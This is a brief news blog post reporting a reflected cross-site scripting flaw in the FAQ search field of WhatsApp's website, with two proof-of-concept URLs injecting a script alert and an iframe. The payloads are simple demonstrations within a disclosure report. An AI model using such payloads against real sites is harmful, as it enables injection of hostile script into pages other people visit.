Search This Blog

Powered by Blogger.

Blog Archive

Labels

WhatsApp website vulnerable to XSS Security flaw

An Information Security Expert, Narendra Chavda From Ahmedabad Gujarat, has discovered a non-persistent XSS security flaw in the official website of WhatsApp.
An Information Security Expert, Narendra Chavda From Ahmedabad Gujarat, has discovered a non-persistent XSS security flaw in the official website of WhatsApp.

Narendra found that the Search Query field in the FAQ webpage of the whatsapp.com is vulnerable to  XSS attack.


When an attacker visits "www.whatsapp.com/faq/" and enter the xss code in the field , it successfully executes the entered script.

POC code :
www.whatsapp.com/faq/search/?q=<script>alert("E Hacking News")</script>
The site also allows users to inject the iframe code:
http://www.whatsapp.com/faq/search/?q=<iframe src="http://www.ehackingnews.com/"height="1000px"width="1000px">
Share it:

Breaking News

Cyber Security News

hacker news

Non Persistent XSS

Vulnerability

XSS Vulnerability